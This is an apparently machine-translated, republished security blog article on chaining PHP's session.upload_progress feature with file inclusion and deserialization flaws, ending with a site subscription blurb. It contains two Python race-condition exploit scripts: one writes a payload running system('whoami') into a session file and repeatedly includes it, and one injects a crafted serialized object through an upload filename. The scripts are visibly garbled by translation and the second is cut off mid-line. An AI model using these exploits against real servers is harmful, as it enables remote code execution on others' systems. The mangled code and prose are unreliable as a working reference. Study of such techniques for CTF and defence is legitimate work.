Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to use session.upload_progress for file inclusion and deserialization infiltration, the content of the article is of high quality, so the editor will share it for you as a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

Preface

The following is mainly to use the session.upload_progress function in PHP as a springboard to exploit file inclusion and deserialization vulnerabilities. Since you first need to know something about session and its deserialization, you'll introduce them first.

Session.upload_progress in php

This feature was added in php5.4, so test buddies, pay attention to the next version.

There are several default options in php.ini

1. Session.upload_progress.enabled = on

2. Session.upload_progress.cleanup = on

3. Session.upload_progress.prefix = "upload_progress_"

4. Session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS"

5. Session.upload_progress.freq = "1%"

6. Session.upload_progress.min_freq = "1"

In fact, here, we only need to understand the first four configuration options, hey, the following in turn.

Enabled=on indicates that the upload_progress function starts, which also means that when the browser uploads a file to the server, php will store the details of the file upload (such as upload time, upload progress, etc.) in session

Cleanup=on said that when the file is uploaded, php will immediately empty the contents of the corresponding session file. This option is very important.

Name when it appears in the form, php will report the upload progress. The biggest advantage is that its value is controllable.

Prefix+name will be represented as a key name in session

Session related configuration and session deserialization

Since this is not the focus of this article, several related links are attached here.

Https://www.cnblogs.com/iamstudy/articles/php_serialize_problem.html

Https://blog.spoock.com/2016/10/16/php-serialize-problem/?utm_source=tuicool&utm_medium=referral

In addition, add an important option in the session configuration.

The default value of the session.use_strict_mode=off option is off, which means that we can control the sessionid in Cookie. This is crucial and will be used below.

Using session.upload_progress for file inclusion using test environment

Php5.5.38

Win10

All configurations related to session are default values

Sample code

As you can see, there is a file containing vulnerability, but a malicious file that can be included cannot be found. In fact, we can use session.upload_progress to write malicious statements to the session file, thus including the session file. You need to know where the session file is stored.

Analysis.

Question one

How to create a session file without session_start () in the code.

Answer one

In fact, if session.auto_start=On, PHP automatically initializes the Session when it receives the request, eliminating the need to execute session_start (). By default, however, this option is turned off.

However, session also has a default option, and the default value of session.use_strict_mode is 0. At this point, users can define their own Session ID. For example, setting PHPSESSID=TGAO,PHP in Cookie will create a file on the server: / tmp/sess_TGAO ". Even if the user does not initialize Session,PHP at this time, Session will be initialized automatically. and generate a key value, which has ini.get (" session.upload_progress.prefix ") + consists of the session.upload_progress.name value we constructed, and is finally written into the sess_ file.

Question two

But here comes the problem. The default configuration session.upload_progress.cleanup = on causes the contents of the session file to be cleared immediately after the file is uploaded.

How to carry out rce?

Answer two

At this point, we can take advantage of the competition to include and utilize the contents of the session file as never before.

Use the script # coding=utf-8

Import io

Import requests

Import threading

Sessid = 'TGAO'

Data = {"cmd": "system ('whoami');"}

Def write (session):

While True:

F = io.BytesIO (bachela'* 1024 * 50)

Resp = session.post ('http://127.0.0.1:5555/test56.php', data= {' PHP_SESSION_UPLOAD_PROGRESS':'}, files= {'file': (' tgao.txt',f)}, cookies= {'PHPSESSID': sessid})

Def read (session):

While True:

Resp = session.post ('http://127.0.0.1:5555/test56.php?file=session/sess_'+sessid,data=data)

If 'tgao.txt' in resp.text:

Print (resp.text)

Event.clear ()

Else:

Print ("[+] retry")

If _ _ name__== "_ _ main__":

Event=threading.Event ()

With requests.session () as session:

For i in xrange (1Jing 30)

Threading.Thread (target=write,args= (session,). Start ()

For i in xrange (1Jing 30)

Threading.Thread (target=read,args= (session,). Start ()

Event.set ()

The effect is as follows

Ctf topic

Recently, there is a justsoso in the national information security competition for college students, and the code of one page is as follows.

As you can see in the first few lines of the code, the scenario is similar to the previous example code, except that the variable $file is filtered, but it doesn't matter.

Using the same idea, we will no longer talk about it here, and there are corresponding solutions on the Internet.

Summary

Utilization condition

1. There is a file inclusion vulnerability.

two。 If you know the session file storage path, you can try the default path.

3. Have access to read and write session files

Test environment for deserialization attacks using session.upload_progress

Php5.5.38

Win10

Session.serialize_handler=php_serialize, other session-related configurations are default

Sample code analysis

Question one

There is no parameter control in the whole code. What is the method of deserialization utilization?

Answer one

Here, the file is uploaded using PHP_SESSION_UPLOAD_PROGRESS, in which the file name can be controlled to construct a malicious serialization statement and write it to the session file.

In addition, like the use of file inclusion, there is a need for competition.

Use script

Firstly, malicious serialization statements are constructed by using exp.php scripts.

It uses exp.py scripts to compete.

# coding=utf-8

Import requests

Import threading

Import io

Import sys

Def exp (ip,port):

F = io.BytesIO (baked a' * 1024 * 102431)

While True:

Et.wait ()

Url = 'http://'+ip+':'+str(port)+'/test5.php'

Headers = {

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'

'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'

'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3'

'DNT':'1'

'Cookie': 'PHPSESSID=20190506'

'Connection': 'close'

'Upgrade-Insecure-Requests':'1'

}

Proxy = {

'http':' 127.0.0.1purl 8080'

}

Data= {'PHP_SESSION_UPLOAD_PROGRESS':'123'}

Files= {

'file': (r' | ORV 4:\ "Door\": 1: {SLV 6:\ "handle\"; ORV 2:\ "IP\": 1: {SRAV 2:\ "ip\"; SRAV 10:\ "phpinfo ();\";}', fjigma textcharpact')

}

Resp = requests.post (url,headers=headers,data=data,files=files,proxies=proxy) #, proxies=proxy

Resp.encoding= "utf-8"

If len (resp.text)

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.